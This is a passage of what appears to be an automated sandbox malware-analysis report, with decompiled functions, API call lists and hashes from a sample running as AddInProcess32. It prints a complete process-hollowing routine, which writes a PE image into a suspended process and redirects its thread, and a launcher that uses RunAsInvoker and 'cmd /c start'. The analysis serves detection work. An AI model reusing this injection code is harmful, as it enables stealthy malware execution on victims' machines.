                                              													__eflags = _t239 - 5;
                                              													if(_t239 >= 5) {
                                              														goto L95;
                                              													}
                                              													Sleep(0xa);
                                              													_t240 = EnumWindows(E00402000,  &_v4100);
                                              													__eflags = _t240;
                                              													if(_t240 != 0) {
                                              														continue;
                                              													}
                                              													goto L95;
                                              												}
                                              												goto L95;
                                              											}
                                              											goto L37;
                                              										}
                                              										_v4132 = GetLastError();
                                              										goto L37;
                                              									}
                                              									goto L101;
                                              								}
                                              								E00401880(L"Error launching program", _t218);
                                              								_t361 = _t367 + 4;
                                              								goto L101;
                                              							}
                                              							__eflags = _t272 - 2;
                                              							if(_t272 <= 2) {
                                              								L22:
                                              								_t244 = _v4081;
                                              								L23:
                                              								__eflags = _t244;
                                              								_t245 = E00401930(_t285 & 0xffffff00 | _t244 == 0x00000000);
                                              								_t361 = _t365 + 4;
                                              								_v4088 = _t245;
                                              								goto L101;
                                              							}
                                              							_t247 = E0040346A( *(_v4080 + 8),  *(_v4080 + 8), L"/quiet");
                                              							_t365 = _t365 + 8;
                                              							__eflags = _t247;
                                              							_t244 = 1;
                                              							if(_t247 == 0) {
                                              								goto L23;
                                              							}
                                              							goto L22;
                                              						}
                                              						__eflags = _t272 - 2;
                                              						if(_t272 <= 2) {
                                              							L17:
                                              							_t248 = _v4081;
                                              							L18:
                                              							__eflags = _t248;
                                              							_t251 = E00401BA0(1, _t344, _t248, _t248 & 0xffffff00 | _t248 == 0x00000000);
                                              							_t361 = _t364 + 4;
                                              							_v4088 = _t251;
                                              							goto L101;
                                              						}
                                              						_t252 = E0040346A(_t213,  *(_v4080 + 8), L"/quiet");
                                              						_t364 = _t364 + 8;
                                              						__eflags = _t252;
                                              						_t248 = 1;
                                              						if(_t252 == 0) {
                                              							goto L18;
                                              						}
                                              						goto L17;
                                              					}
                                              					__eflags = _t272 - 2;
                                              					if(_t272 <= 2) {
                                              						L12:
                                              						_t253 = _v4081;
                                              						L13:
                                              						__eflags = _t253;
                                              						_t255 = E00401BA0(0, _t344, _t253, _t312 & 0xffffff00 | _t253 == 0x00000000);
                                              						_t361 = _t363 + 4;
                                              						_v4088 = _t255;
                                              						goto L101;
                                              					}
                                              					_t257 = E0040346A(_v4080,  *(_v4080 + 8), L"/quiet");
                                              					_t363 = _t363 + 8;
                                              					__eflags = _t257;
                                              					_t253 = 1;
                                              					if(_t257 == 0) {
                                              						goto L13;
                                              					}
                                              					goto L12;
                                              				}
                                              				_t353 = 2;
                                              				if(_t272 <= 2) {
                                              					goto L28;
                                              				}
                                              				_t258 = E0040346A(_t210,  *(_v4080 + 8), L"/netonly");
                                              				_t362 = _t362 + 8;
                                              				if(_t258 == 0) {
                                              					_t30 = _t258 + 3; // 0x3
                                              					_t353 = _t30;
                                              					SetEnvironmentVariableW(L"__COMPAT_LAYER", L"RunAsInvoker");
                                              				}
                                              				if(_t272 <= _t353) {
                                              					goto L28;
                                              				}
                                              				E00409280(_t339,  &(_v3876.lpReserved), 0, 0x40);
                                              				_v4040.hProcess = 0;
                                              				_v4040.hThread = 0;
                                              				_v4040.dwProcessId = 0;
                                              				_v4040.dwThreadId = 0;
                                              				_v3876.cb = 0x44;
                                              				_v3876.wShowWindow = 1;
                                              				E004036E5(0,  &_v1052, 0x208, L"cmd /c start ");
                                              				E0040366B( *((intOrPtr*)(_v4080 + _t353 * 4)),  &_v1052, 0x208,  *((intOrPtr*)(_v4080 + _t353 * 4)));
                                              				_t361 = _t362 + 0x24;
                                              				if(CreateProcessW(0,  &_v1052, 0, 0, 0, 0x8000000, 0, 0,  &_v3876,  &_v4040) == 0) {
                                              					_v4088 = GetLastError();
                                              				}
                                              				goto L101;
                                              			}




























































































                                              0x00402056
                                              0x0040205c
                                              0x00402063
                                              0x0040207b
                                              0x0040207f
                                              0x00402081
                                              0x00402085
                                              0x00402089
                                              0x00402091
                                              0x004020a7
                                              0x004020af
                                              0x004020c5
                                              0x004020cd
                                              0x004020e3
                                              0x004020eb
                                              0x004020fe
                                              0x00402105
                                              0x0040210c
                                              0x00402110
                                              0x00402114
                                              0x00402118
                                              0x0040211c
                                              0x00402120
                                              0x00402126
                                              0x0040212c
                                              0x00402130
                                              0x00402134
                                              0x00402138
                                              0x0040213d
                                              0x00402143
                                              0x00402881
                                              0x0040288f
                                              0x00402897
                                              0x0040289f
                                              0x004028a7
                                              0x004028ab
                                              0x004028b3
                                              0x004028bf
                                              0x004028cb
                                              0x004028dd
                                              0x004028e1
                                              0x004028e9
                                              0x004028ed
                                              0x004028f5
                                              0x0040291f
                                              0x00402921
                                              0x00402923
                                              0x00402925
                                              0x0040295e
                                              0x0040295e
                                              0x00402966
                                              0x0040296b
                                              0x00402978
                                              0x0040297d
                                              0x0040297e
                                              0x00402981
                                              0x00402989
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00402927
                                              0x00402927
                                              0x0040292d
                                              0x00402933
                                              0x00402935
                                              0x0040293c
                                              0x00402947
                                              0x00402947
                                              0x00402958
                                              0x0040295a
                                              0x0040295a
                                              0x00000000
                                              0x00402927
                                              0x00402150
                                              0x00402159
                                              0x0040215d
                                              0x00402162
                                              0x00402167
                                              0x00000000
                                              0x00000000
                                              0x00402175
                                              0x0040217a
                                              0x0040217f
                                              0x0040227f
                                              0x00402287
                                              0x0040228c
                                              0x0040228f
                                              0x00402291
                                              0x004022d8
                                              0x004022dd
                                              0x004022e0
                                              0x004022e2
                                              0x00402321
                                              0x00402329
                                              0x0040232e
                                              0x00402331
                                              0x00402333
                                              0x00402378
                                              0x0040237d
                                              0x00402380
                                              0x00402382
                                              0x00402384
                                              0x00402387
                                              0x0040238c
                                              0x00402392
                                              0x00402392
                                              0x00402398
                                              0x00402398
                                              0x0040239a
                                              0x0040239a
                                              0x0040239e
                                              0x0040239e
                                              0x004023a1
                                              0x004023b1
                                              0x004023c3
                                              0x004023c8
                                              0x004023cb
                                              0x004023cd
                                              0x004023d1
                                              0x004023f2
                                              0x004023f3
                                              0x004023f4
                                              0x00402400
                                              0x00402405
                                              0x00402408
                                              0x0040240a
                                              0x0040240e
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00402414
                                              0x00402414
                                              0x00402423
                                              0x0040243a
                                              0x00402451
                                              0x0040245d
                                              0x00402469
                                              0x00402477
                                              0x00402478
                                              0x00402479
                                              0x00402480
                                              0x00402485
                                              0x00402488
                                              0x0040248a
                                              0x0040248e
                                              0x00000000
                                              0x00000000
                                              0x00402494
                                              0x004024af
                                              0x004024be
                                              0x004024c7
                                              0x004024df
                                              0x004024e6
                                              0x004024ee
                                              0x004024f4
                                              0x004024f6
                                              0x00402504
                                              0x00402506
                                              0x0040254b
                                              0x0040254b
                                              0x00402553
                                              0x00000000
                                              0x00000000
                                              0x00402559
                                              0x00402561
                                              0x00000000
                                              0x00000000
                                              0x00402567
                                              0x0040256f
                                              0x00000000
                                              0x00000000
                                              0x00402575
                                              0x0040257d
                                              0x00000000
                                              0x00000000
                                              0x00402583
                                              0x00402588
                                              0x00000000
                                              0x00000000
                                              0x0040258e
                                              0x00402596
                                              0x00000000
                                              0x00000000
                                              0x0040259c
                                              0x004025a4
                                              0x00000000
                                              0x00000000
                                              0x004025aa
                                              0x004025b2
                                              0x00000000
                                              0x00000000
                                              0x004025b8
                                              0x004025bd
                                              0x00000000
                                              0x00000000
                                              0x004025c3
                                              0x004025cb
                                              0x00000000
                                              0x00000000
                                              0x004025d1
                                              0x004025d9
                                              0x00000000
                                              0x00000000
                                              0x004025df
                                              0x004025e7
                                              0x00000000
                                              0x00000000
                                              0x004025ed
                                              0x004025f5
                                              0x00000000
                                              0x00000000
                                              0x004025fb
                                              0x00402603
                                              0x00000000
                                              0x00000000
                                              0x00402609
                                              0x00402611
                                              0x00000000
                                              0x00000000
                                              0x00402617
                                              0x0040261f
                                              0x00000000
                                              0x00000000
                                              0x00402625
                                              0x0040262d
                                              0x00000000
                                              0x00000000
                                              0x00402633
                                              0x0040263b
                                              0x00000000
                                              0x00000000
                                              0x00402641
                                              0x00402649
                                              0x00000000
                                              0x00000000
                                              0x0040264f
                                              0x00402657
                                              0x00000000
                                              0x00000000
                                              0x0040265d
                                              0x00402665
                                              0x00000000
                                              0x00000000
                                              0x0040266b
                                              0x00402673
                                              0x00000000
                                              0x00000000
                                              0x00402679
                                              0x00402681
                                              0x00000000
                                              0x00000000
                                              0x00402687
                                              0x0040268f
                                              0x00000000
                                              0x00000000
                                              0x00402695
                                              0x0040269d
                                              0x00000000
                                              0x00000000
                                              0x004026a3
                                              0x004026ab
                                              0x00000000
                                              0x00000000
                                              0x004026b1
                                              0x004026b9
                                              0x00000000
                                              0x00000000
                                              0x004026bf
                                              0x004026c7
                                              0x00000000
                                              0x00000000
                                              0x004026cd
                                              0x004026d5
                                              0x00000000
                                              0x00000000
                                              0x004026db
                                              0x004026e3
                                              0x00000000
                                              0x00000000
                                              0x004026e9
                                              0x004026f1
                                              0x00000000
                                              0x00000000
                                              0x004026f7
                                              0x004026ff
                                              0x00000000
                                              0x00000000
                                              0x00402705
                                              0x0040270d
                                              0x00000000
                                              0x00000000
                                              0x00402713
                                              0x0040271b
                                              0x00000000
                                              0x00000000
                                              0x00402721
                                              0x00402729
                                              0x00000000
                                              0x00000000
                                              0x0040272f
                                              0x00402737
                                              0x00000000
                                              0x00000000
                                              0x0040273d
                                              0x00402745
                                              0x00000000
                                              0x00000000
                                              0x0040274b
                                              0x00402753
                                              0x00000000
                                              0x00000000
                                              0x00402759
                                              0x00402761
                                              0x00000000
                                              0x00000000
                                              0x00402767
                                              0x0040276f
                                              0x00000000
                                              0x00000000
                                              0x00402775
                                              0x0040277d
                                              0x00000000
                                              0x00000000
                                              0x00402783
                                              0x0040278b
                                              0x00000000
                                              0x00000000
                                              0x00402791
                                              0x00402799
                                              0x00000000
                                              0x00000000
                                              0x0040279f
                                              0x004027a7
                                              0x00000000
                                              0x00000000
                                              0x004027ad
                                              0x004027b5
                                              0x00000000
                                              0x00000000
                                              0x004027bb
                                              0x004027c3
                                              0x00000000
                                              0x00000000
                                              0x004027c9
                                              0x004027d1
                                              0x00000000
                                              0x00000000
                                              0x004027d7
                                              0x004027df
                                              0x00000000
                                              0x00000000
                                              0x004027e5
                                              0x004027ed
                                              0x00000000
                                              0x00000000
                                              0x004027f3
                                              0x004027fb
                                              0x00000000
                                              0x00000000
                                              0x00402801
                                              0x00402809
                                              0x00000000
                                              0x00000000
                                              0x0040280f
                                              0x00402813
                                              0x00402818
                                              0x00000000
                                              0x00000000
                                              0x0040281e
                                              0x00402820
                                              0x00402868
                                              0x00402873
                                              0x0040287a
                                              0x00000000
                                              0x0040287a
                                              0x00402828
                                              0x0040282d
                                              0x00000000
                                              0x0040282d
                                              0x00402515
                                              0x00402527
                                              0x0040252c
                                              0x0040252f
                                              0x00402531
                                              0x00000000
                                              0x00000000
                                              0x0040253d
                                              0x00402543
                                              0x00402545
                                              0x0040283b
                                              0x00402840
                                              0x00402840
                                              0x00402845
                                              0x00000000
                                              0x00000000
                                              0x00402847
                                              0x00402849
                                              0x0040284b
                                              0x0040284e
                                              0x00000000
                                              0x00000000
                                              0x00402852
                                              0x0040285e
                                              0x00402864
                                              0x00402866
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00402866
                                              0x00000000
                                              0x00402840
                                              0x00000000
                                              0x00402545
                                              0x004024fe
                                              0x00000000
                                              0x004024fe
                                              0x00000000
                                              0x00402414
                                              0x004023d9
                                              0x004023de
                                              0x00000000
                                              0x004023de
                                              0x00402335
                                              0x00402338
                                              0x00402355
                                              0x00402355
                                              0x00402359
                                              0x00402359
                                              0x0040235f
                                              0x00402364
                                              0x00402367
                                              0x00000000
                                              0x00402367
                                              0x00402347
                                              0x0040234c
                                              0x0040234f
                                              0x00402351
                                              0x00402353
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00402353
                                              0x004022e4
                                              0x004022e7
                                              0x00402304
                                              0x00402304
                                              0x00402308
                                              0x00402308
                                              0x00402310
                                              0x00402315
                                              0x00402318
                                              0x00000000
                                              0x00402318
                                              0x004022f6
                                              0x004022fb
                                              0x004022fe
                                              0x00402300
                                              0x00402302
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00402302
                                              0x00402293
                                              0x00402296
                                              0x004022b3
                                              0x004022b3
                                              0x004022b7
                                              0x004022b7
                                              0x004022bf
                                              0x004022c4
                                              0x004022c7
                                              0x00000000
                                              0x004022c7
                                              0x004022a5
                                              0x004022aa
                                              0x004022ad
                                              0x004022af
                                              0x004022b1
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x004022b1
                                              0x00402185
                                              0x0040218c
                                              0x00000000
                                              0x00000000
                                              0x0040219f
                                              0x004021a4
                                              0x004021a9
                                              0x004021b5
                                              0x004021b5
                                              0x004021b8
                                              0x004021b8
                                              0x004021c0
                                              0x00000000
                                              0x00000000
                                              0x004021d2
                                              0x004021ee
                                              0x004021f6
                                              0x004021fa
                                              0x004021fe
                                              0x00402202
                                              0x0040220d
                                              0x00402217
                                              0x00402234
                                              0x00402239
                                              0x0040226a
                                              0x00402276
                                              0x00402276
                                              0x00000000

                                              APIs
                                              • _memset.LIBCMT ref: 00402091
                                              • _memset.LIBCMT ref: 004020AF
                                              • _memset.LIBCMT ref: 004020CD
                                              • _memset.LIBCMT ref: 004020EB
                                              • _memset.LIBCMT ref: 00402105
                                                • Part of subcall function 00401800: __wcsicmp.LIBCMT ref: 00401819
                                                • Part of subcall function 00401800: __wcsicmp.LIBCMT ref: 0040182E
                                              • __wcsicmp.LIBCMT ref: 0040215D
                                              • __wcsicmp.LIBCMT ref: 00402175
                                              • __wcsicmp.LIBCMT ref: 0040219F
                                                • Part of subcall function 0040346A: __wcsicmp_l.LIBCMT ref: 004034F0
                                              • SetEnvironmentVariableW.KERNEL32(__COMPAT_LAYER,RunAsInvoker), ref: 004021B8
                                              • _memset.LIBCMT ref: 004021D2
                                              • _wcscpy_s.LIBCMT ref: 00402217
                                              • _wcscat_s.LIBCMT ref: 00402234
                                              • CreateProcessW.KERNEL32 ref: 00402262
                                              • GetLastError.KERNEL32(?,?,?,?,00000208,cmd /c start ), ref: 00402270
                                              • __wcsicmp.LIBCMT ref: 00402287
                                              • __wcsicmp.LIBCMT ref: 004022A5
                                              • __wcsicmp.LIBCMT ref: 004022D8
                                              • __wcsicmp.LIBCMT ref: 004022F6
                                              • __wcsicmp.LIBCMT ref: 00402329
                                              • __wcsicmp.LIBCMT ref: 00402347
                                              • __wcsicmp.LIBCMT ref: 00402378
                                              • _wcscpy_s.LIBCMT ref: 004023B1
                                              • _memset.LIBCMT ref: 00402423
                                              • _memset.LIBCMT ref: 0040243A
                                              • _memset.LIBCMT ref: 00402451
                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000), ref: 004024EE
                                              • GetLastError.KERNEL32 ref: 004024F8
                                                • Part of subcall function 00403926: __wcslwr_s_l.LIBCMT ref: 00403930
                                              • EnumWindows.USER32(00402000,?), ref: 0040253D
                                              • Sleep.KERNEL32(0000000A), ref: 00402852
                                              • EnumWindows.USER32(00402000,00000000), ref: 0040285E
                                              • CloseHandle.KERNEL32(?), ref: 00402873
                                              • CloseHandle.KERNEL32(?), ref: 0040287A
                                              • LoadIconW.USER32 ref: 004028B7
                                              • LoadIconW.USER32(?,ICON), ref: 004028C3
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 004028D2
                                              • RegisterClassExW.USER32 ref: 004028F5
                                              • CreateDialogParamW.USER32 ref: 00402908
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402921
                                              • IsDialogMessageW.USER32(00000000,?), ref: 0040292D
                                              • TranslateMessage.USER32(?), ref: 0040293C
                                              • DispatchMessageW.USER32 ref: 00402947
                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00402958
                                              • LocalFree.KERNEL32(?,?,AboutUsage,00000000,Function_00001D50,00000000,?,?,?,?,ICON), ref: 0040296B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392248619.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000007.00000002.392248619.0000000000416000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: __wcsicmp$_memset$Message$CreateLoad$CloseDialogEnumErrorHandleIconLastProcessWindows_wcscpy_s$ClassCursorDispatchEnvironmentFreeLocalLogonParamRegisterSleepTranslateVariableWith__wcsicmp_l__wcslwr_s_l_wcscat_s
                                              • String ID: /netonly$/quiet$/raw$/reg$/regnetonly$/unreg$0$AboutUsage$D$D$Error launching application$Error launching program$ICON$RunAsInvoker$SHELLRUNAS$W$__COMPAT_LAYER$cmd /c start $cmd.exe
                                              • API String ID: 417924082-754762936
                                              • Opcode ID: 272b203ec08cb67b929b858a7bb471570156c7c47330ce23cc0cfe630b3236f6
                                              • Instruction ID: b9bcd2630ba5b8b6581695927ee2c04d685a99353c32d213ca7add1f89437002
                                              • Opcode Fuzzy Hash: 272b203ec08cb67b929b858a7bb471570156c7c47330ce23cc0cfe630b3236f6
                                              • Instruction Fuzzy Hash: 81228F71508300AFD728DB29C949B9BB7E8AB84305F04883EF598762D1D7BD9944CF6B
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 84%
                                              			E02B522F0(void* __ebx, signed int __ecx, intOrPtr* __edx, void* __edi, void* __esi, void* __eflags, signed int _a4, intOrPtr* _a8) {
                                              				signed int _v12;
                                              				struct _CONTEXT _v736;
                                              				void _v740;
                                              				signed int _v744;
                                              				void _v748;
                                              				struct _PROCESS_INFORMATION _v768;
                                              				WCHAR* _v772;
                                              				signed int _v776;
                                              				intOrPtr* _v780;
                                              				void _v784;
                                              				WCHAR* _v788;
                                              				struct _MEMORY_BASIC_INFORMATION _v816;
                                              				intOrPtr _v836;
                                              				char _v840;
                                              				struct _STARTUPINFOW _v912;
                                              				signed int _t102;
                                              				void* _t106;
                                              				int _t110;
                                              				intOrPtr* _t119;
                                              				intOrPtr _t140;
                                              				signed int _t144;
                                              				intOrPtr _t171;
                                              				void* _t173;
                                              				intOrPtr _t186;
                                              				unsigned int _t187;
                                              				signed int _t189;
                                              				void* _t192;
                                              				intOrPtr _t193;
                                              				WCHAR* _t196;
                                              				void* _t197;
                                              				unsigned int _t200;
                                              				intOrPtr* _t203;
                                              				WCHAR* _t204;
                                              				intOrPtr* _t207;
                                              				intOrPtr* _t209;
                                              				WCHAR* _t210;
                                              				signed int _t211;
                                              				void* _t213;
                                              				signed int _t216;
                                              				signed int _t217;
                                              				void* _t219;
                                              				void* _t221;
                                              				intOrPtr* _t223;
                                              				signed int _t225;
                                              
                                              				_t102 =  *0x2b56004; // 0xbb40e64e
                                              				_v12 = _t102 ^ _t225;
                                              				_t203 = _a8;
                                              				_t209 = __edx;
                                              				_v776 = _a4;
                                              				_v744 = __ecx;
                                              				_t173 = 0;
                                              				_v780 = __edx;
                                              				_v772 = _t203;
                                              				_t106 = E02B52CE7(0,  &_v912, 0x44);
                                              				_v912.cb = 0x44;
                                              				E02B52CE7(_t106,  &_v768, 0x10);
                                              				if(E02B52730(0, _t203, _t209) != 0) {
                                              					if( *_t209 != 0x5a4d) {
                                              						goto L1;
                                              					}
                                              					_t119 =  *((intOrPtr*)(_t209 + 0x3c)) + _t209;
                                              					_v748 = _t119;
                                              					if( *_t119 != 0x4550) {
                                              						goto L1;
                                              					}
                                              					_t211 = 0;
                                              					if(_t203 == 0) {
                                              						L8:
                                              						_t204 = HeapAlloc(GetProcessHeap(), 0, 0x21c + _t211 * 2);
                                              						_v788 = _t204;
                                              						if(_t204 == 0) {
                                              							_t110 = 0;
                                              							_t210 = 0;
                                              							L36:
                                              							if(_t210 != 0) {
                                              								L39:
                                              								if(_t173 != 0) {
                                              									HeapFree(GetProcessHeap(), 0, _t173);
                                              								}
                                              								if(_t204 != 0) {
                                              									HeapFree(GetProcessHeap(), 0, _t204);
                                              								}
                                              								return E02B53C33(_v12 ^ _t225);
                                              							}
                                              							L37:
                                              							if(_v768.hProcess != 0) {
                                              								TerminateProcess(_v768.hProcess, _t110);
                                              							}
                                              							goto L39;
                                              						}
                                              						E02B52CE7(0x21c + _t211 * 2, _t204, 0x21c + _t211 * 2);
                                              						StrCatW(_t204, _v744);
                                              						if(_t211 != 0) {
                                              							StrCatW(_t204, " ");
                                              							StrCatW(_t204, _v772);
                                              						}
                                              						_t210 = 0;
                                              						if(CreateProcessW(0, _t204, 0, 0, 0, 4, 0, 0,  &_v912,  &_v768) != 0) {
                                              							_v736.ContextFlags = 0x10007;
                                              							if(GetThreadContext(_v768.hThread,  &_v736) == 0) {
                                              								goto L12;
                                              							}
                                              							E02B52CE7(_t130,  &_v840, 0x18);
                                              							_v772 = _v772 & _t173;
                                              							_push( &_v772);
                                              							_push(0x18);
                                              							_push( &_v840);
                                              							_push(0);
                                              							_push(_v768.hProcess);
                                              							if( *0x2b59390() >= 0) {
                                              								_t173 = HeapAlloc(GetProcessHeap(), 0, _v776 << 3);
                                              								_t213 = 0x10000;
                                              								_t140 =  *((intOrPtr*)(_v748 + 0x50));
                                              								_t141 =  <=  ? 0x190000 : _t140;
                                              								_v748 =  <=  ? 0x190000 : _t140;
                                              								while(1) {
                                              									VirtualQueryEx(_v768.hProcess, _t213,  &_v816, 0x1c);
                                              									_t186 = _v816.RegionSize;
                                              									_t200 = _t213;
                                              									_t213 = _v816.BaseAddress + _t186;
                                              									if(_t186 >= _v748 && _v816.Protect == 1 && _v816.State == 0x10000) {
                                              										break;
                                              									}
                                              									if(_t200 < 0x80000000) {
                                              										continue;
                                              									}
                                              									goto L15;
                                              								}
                                              								_t144 = _t200;
                                              								asm("cdq");
                                              								_t187 = _t200;
                                              								_t216 = (_t187 << 0x00000020 | _t144) >> 0x10;
                                              								_t189 = (_t187 >> 0x00000010 << 0x00000020 | _t216) << 0x10;
                                              								_t217 = _t216 << 0x10;
                                              								if(_t217 != _t144 || _t189 != _t200) {
                                              									_t144 = 0x10000 + _t217;
                                              									asm("adc ecx, 0x0");
                                              									_v748 = _t189;
                                              								}
                                              								_v748 = _t144;
                                              								_t219 = _v836 + 8;
                                              								_v776 = _t219;
                                              								if(WriteProcessMemory(_v768.hProcess, _t219,  &_v748, 4, 0) == 0 || ReadProcessMemory(_v768.hProcess, _t219,  &_v740, 4, 0) == 0 || E02B5226E(_t173, _v780, _t173, _v740) == 0) {
                                              									goto L15;
                                              								} else {
                                              									_t221 =  *((intOrPtr*)(_t173 + 0x3c)) + _t173;
                                              									 *0x2b59394(_v768.hProcess, _v740);
                                              									_t192 = VirtualAllocEx(_v768.hProcess, _v740,  *(_t221 + 0x50), 0x3000, 0x40);
                                              									_v748 = _t192;
                                              									if(_t192 == 0) {
                                              										goto L15;
                                              									}
                                              									 *((intOrPtr*)(_t221 + 0x34)) = _v740;
                                              									if(WriteProcessMemory(_v768.hProcess, _t192, _t173,  *(_t221 + 0x54), 0) == 0) {
                                              										goto L15;
                                              									}
                                              									_v744 = _v744 & 0x00000000;
                                              									_t193 =  *((intOrPtr*)(_t173 + 0x3c));
                                              									if(0 >=  *(_t221 + 6)) {
                                              										L34:
                                              										_v784 = _v740;
                                              										WriteProcessMemory(_v768.hProcess, _v776,  &_v784, 4, 0);
                                              										_v736.Eax =  *((intOrPtr*)(_t221 + 0x28)) + _v784;
                                              										SetThreadContext(_v768.hThread,  &_v736);
                                              										ResumeThread(_v768.hThread);
                                              										_t210 = _v768.dwProcessId;
                                              										_t110 = 0;
                                              										goto L36;
                                              									}
                                              									_t207 = _v780 + 0x104 + _t193;
                                              									do {
                                              										WriteProcessMemory(_v768, _v748 +  *_t207,  *_t207 + _t173,  *(_t207 + 4), 0);
                                              										_t207 = _t207 + 0x28;
                                              										_t196 = _v744 + 1;
                                              										_v744 = _t196;
                                              									} while (_t196 < ( *(_t221 + 6) & 0x0000ffff));
                                              									_t204 = _v788;
                                              									goto L34;
                                              								}
                                              							}
                                              							L15:
                                              							_t110 = 0;
                                              							_t210 = 0;
                                              						} else {
                                              							L12:
                                              							_t110 = 0;
                                              						}
                                              						goto L37;
                                              					}
                                              					_t223 = _t203;
                                              					_t14 = _t223 + 2; // 0x2
                                              					_t197 = _t14;
                                              					do {
                                              						_t171 =  *_t223;
                                              						_t223 = _t223 + 2;
                                              					} while (_t171 != 0);
                                              					_t211 = _t223 - _t197 >> 1;
                                              					goto L8;
                                              				}
                                              				L1:
                                              				_t204 = _v740;
                                              				_t110 = 0;
                                              				_t210 = 0;
                                              				goto L37;
                                              			}















































                                              0x02b522f9
                                              0x02b52300
                                              0x02b52309
                                              0x02b5230c
                                              0x02b5230e
                                              0x02b52316
                                              0x02b5231c
                                              0x02b52326
                                              0x02b5232c
                                              0x02b52332
                                              0x02b52340
                                              0x02b5234a
                                              0x02b52357
                                              0x02b52370
                                              0x00000000
                                              0x00000000
                                              0x02b52375
                                              0x02b52377
                                              0x02b52383
                                              0x00000000
                                              0x00000000
                                              0x02b52387
                                              0x02b5238b
                                              0x02b523a1
                                              0x02b523b7
                                              0x02b523b9
                                              0x02b523c1
                                              0x02b526d7
                                              0x02b526d9
                                              0x02b526db
                                              0x02b526dd
                                              0x02b526f5
                                              0x02b526f7
                                              0x02b52703
                                              0x02b52703
                                              0x02b5270b
                                              0x02b52717
                                              0x02b52717
                                              0x02b5272f
                                              0x02b5272f
                                              0x02b526df
                                              0x02b526e6
                                              0x02b526ef
                                              0x02b526ef
                                              0x00000000
                                              0x02b526e6
                                              0x02b523d1
                                              0x02b523de
                                              0x02b523e6
                                              0x02b523f4
                                              0x02b523fd
                                              0x02b523fd
                                              0x02b52405
                                              0x02b52420
                                              0x02b5242f
                                              0x02b52448
                                              0x00000000
                                              0x00000000
                                              0x02b52458
                                              0x02b5245d
                                              0x02b5246a
                                              0x02b5246b
                                              0x02b52473
                                              0x02b52474
                                              0x02b52476
                                              0x02b5247f
                                              0x02b524a3
                                              0x02b524b0
                                              0x02b524b5
                                              0x02b524ba
                                              0x02b524bd
                                              0x02b524c3
                                              0x02b524d3
                                              0x02b524d9
                                              0x02b524df
                                              0x02b524e7
                                              0x02b524ef
                                              0x00000000
                                              0x00000000
                                              0x02b5250c
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x02b5250e
                                              0x02b52513
                                              0x02b52515
                                              0x02b52518
                                              0x02b5251a
                                              0x02b52521
                                              0x02b52525
                                              0x02b5252a
                                              0x02b52532
                                              0x02b52537
                                              0x02b5253a
                                              0x02b5253a
                                              0x02b5254a
                                              0x02b52550
                                              0x02b52559
                                              0x02b5256f
                                              0x00000000
                                              0x02b525b1
                                              0x02b525c0
                                              0x02b525c2
                                              0x02b525e4
                                              0x02b525e6
                                              0x02b525ee
                                              0x00000000
                                              0x00000000
                                              0x02b525ff
                                              0x02b52612
                                              0x00000000
                                              0x00000000
                                              0x02b52618
                                              0x02b52621
                                              0x02b52628
                                              0x02b52676
                                              0x02b52680
                                              0x02b52699
                                              0x02b526a8
                                              0x02b526bb
                                              0x02b526c7
                                              0x02b526cd
                                              0x02b526d3
                                              0x00000000
                                              0x02b526d3
                                              0x02b52636
                                              0x02b52638
                                              0x02b52652
                                              0x02b5265e
                                              0x02b52665
                                              0x02b52666
                                              0x02b5266c
                                              0x02b52670
                                              0x00000000
                                              0x02b52670
                                              0x02b5256f
                                              0x02b52481
                                              0x02b52481
                                              0x02b52483
                                              0x02b52422
                                              0x02b52422
                                              0x02b52422
                                              0x02b52422
                                              0x00000000
                                              0x02b52420
                                              0x02b5238d
                                              0x02b5238f
                                              0x02b5238f
                                              0x02b52392
                                              0x02b52392
                                              0x02b52395
                                              0x02b52398
                                              0x02b5239f
                                              0x00000000
                                              0x02b5239f
                                              0x02b52359
                                              0x02b52359
                                              0x02b5235f
                                              0x02b52361
                                              0x00000000

                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 02B523AA
                                              • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02B523B1
                                              • StrCatW.SHLWAPI(00000000,?), ref: 02B523DE
                                              • StrCatW.SHLWAPI(00000000,02B542B4), ref: 02B523F4
                                              • StrCatW.SHLWAPI(00000000,?), ref: 02B523FD
                                              • CreateProcessW.KERNEL32 ref: 02B52418
                                              • TerminateProcess.KERNEL32(00000000,00000000,?,00000000), ref: 02B526EF
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 02B526FC
                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 02B52703
                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 02B52710
                                              • HeapFree.KERNEL32(00000000,?,00000000), ref: 02B52717
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.392656395.0000000002B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B50000, based on PE: true
                                              • Associated: 00000007.00000002.392656395.0000000002B56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000007.00000002.392656395.0000000002B5B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2b50000_AddInProcess32.jbxd
                                              Similarity
                                              • API ID: Heap$Process$Free$AllocCreateTerminate
                                              • String ID: D
                                              • API String ID: 2370014981-2746444292
                                              • Opcode ID: 1d727646815faa7304c5c51b3945d65e93b6293f1a0d03e1be8ccf5e90f0e075
                                              • Instruction ID: a5d6c02516b5a858c17a3d1de5ad9c7b019a9c650b670e759d35a90f04aa699e
